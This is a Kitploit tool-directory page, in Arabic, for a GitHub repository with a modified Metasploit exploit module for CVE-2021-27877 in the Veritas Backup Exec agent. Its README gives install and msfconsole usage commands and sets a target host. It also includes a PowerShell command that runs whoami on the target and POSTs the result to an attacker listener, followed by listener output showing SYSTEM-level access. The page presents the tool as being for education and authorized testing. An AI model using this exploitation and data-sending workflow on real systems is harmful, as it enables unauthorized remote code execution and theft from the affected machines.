Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-27877-PoC — نسخة معدلة من وحدة Rapid7 Metasploit الخاصة بـ CVE-2021-27877 تدعم تنفيذ الأوامر المباشرة للتحقق الموثوق من الثغرات الأمنية. تتضمن وثائق تشرح سير عمل الاستغلال، وتعديلات الوحدة، وأمثلة الاستخدام. | Kitploit
أدوات/GitHubGitHub/yashswarup12/cve-2021-27877-poc
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubyashswarup12/cve-2021-27877-poc

CVE-2021-27877-PoC

نسخة معدلة من وحدة Rapid7 Metasploit الخاصة بـ CVE-2021-27877 تدعم تنفيذ الأوامر المباشرة للتحقق الموثوق من الثغرات الأمنية. تتضمن وثائق تشرح سير عمل الاستغلال، وتعديلات الوحدة، وأمثلة الاستخدام.

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل المفهوم لـ CVE-2021-27877

يحتوي هذا المستودع على نسخة معدلة من وحدة Rapid7 Metasploit الأصلية لـ CVE-2021-27877 التي تؤثر على وكيل Veritas Backup Exec.

أثناء اختباراتي، نجحت الوحدة الأصلية لـ Metasploit في تحديد الهدف كعرضة للخطر لكنها فشلت باستمرار في إنشاء جلسة لأن مرحلة تسليم الحمولة لم تنجح. ومع ذلك، أظهر تحليل الوحدة أن المصادقة ووظيفة تنفيذ الأوامر الأساسية كانت تعمل بشكل صحيح.

لتبسيط التحقق من الثغرة، قمت بتعديل الوحدة لتنفيذ أوامر نظام التشغيل التي يوفرها المستخدم مباشرةً من خلال وظيفة تنفيذ أوامر NDMP الضعيفة بدلاً من رفع وتنفيذ حمولة. وهذا يسهل تأكيد تنفيذ الأوامر عن بعد دون الاعتماد على شيل عكسي أو مراحل تحميل الحمولة.

إخلاء مسؤولية: يتم توفير هذا الدليل للأغراض التعليمية واختبارات الأمن المصرح بها فقط. استخدمه فقط ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها.

ملاحظة: لحماية البيئة المستخدمة أثناء الاختبار، تم إخفاء جميع عناوين IP في هذا المستودع. في الأمثلة، يمثل 192.168.x.x المضيف الهدف، بينما يمثل 192.168.y.y النظام المهاجم أو المستمع. لا تؤثر هذه الاستبدالات على وظيفة الدليل.


التعديلات

مقارنةً بالوحدة الأصلية لـ Rapid7، تم إجراء التعديلات التالية:

  • تمت إضافة خيار تشغيل جديد COMMAND.
  • تمت إزالة الاعتماد على رفع حمولة.
  • ينفذ أمرًا واحدًا يحدده المستخدم.
  • لا يحاول إنشاء جلسة Meterpreter.

التثبيت

انسخ الوحدة المعدلة إلى دليل الوحدات المحلية لـ Metasploit.

root@kitploit:~
cp beagent_sha_auth_rce_custom.rb /usr/share/metasploit-framework/modules/exploits/multi/veritas/

ابدأ (أعد تشغيل) Metasploit وأعد تحميل الوحدات المحلية:

root@kitploit:~
msfconsole
reload_all

الاستخدام

قبل تشغيل الوحدة، ابدأ مستمع HTTP (أو أي خادم ويب قادر على استقبال وعرض طلبات HTTP POST). سيتلقى هذا المستمع مخرجات الأمر المنفذ على الهدف.

على سبيل المثال، يمكنك استخدام خادم HTTP بسيط بلغة Python مع معالج طلبات مخصص، أو nc، أو أي مستمع HTTP تختاره.

قم بتحميل الوحدة:

root@kitploit:~
use exploit/multi/veritas/beagent_sha_auth_rce_custom

قم بتكوين الخيارات المطلوبة:

root@kitploit:~
set RHOSTS 192.168.x.x
set RPORT 10000

set COMMAND powershell -Command "$output = whoami; Invoke-WebRequest -Uri 'http://192.168.y.y:8080/' -Method POST -Body $output"

run

يقبل خيار COMMAND أي أمر ترغب في تنفيذه على الهدف.


استرداد مخرجات الأمر

تم تصميم هذه الوحدة لتنفيذ أمر واحد ولا تعيد مخرجات الأمر تلقائيًا.

لاسترداد المخرجات، استخدم آلية رد اتصال مناسبة داخل أمرك (على سبيل المثال، طلب HTTP POST أو قناة صادرة أخرى) وراقب المستمع الخاص بك.

مثال على مخرجات المستمع:

root@kitploit:~
Listening on 0.0.0.0 8080
Connection received on 192.168.x.x 26006
POST / HTTP/ 1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShe11/5.1.14393.9234
Content-Type: application/x-www-form-urlencoded
Host: 192.168.y.y:8080
Content-Length: 19
Expect: 100-continue
Connection: Keep-Alive

nt authority\system

المراجع

  • وحدة Rapid7 Metasploit
  • نشرة الأمان من Veritas (VTS21-001)
  • مقال على Medium

الإسناد

  • الوحدة الأصلية لـ Metasploit: Rapid7
  • التعديلات: Yash Swarup
تنزيل الأداة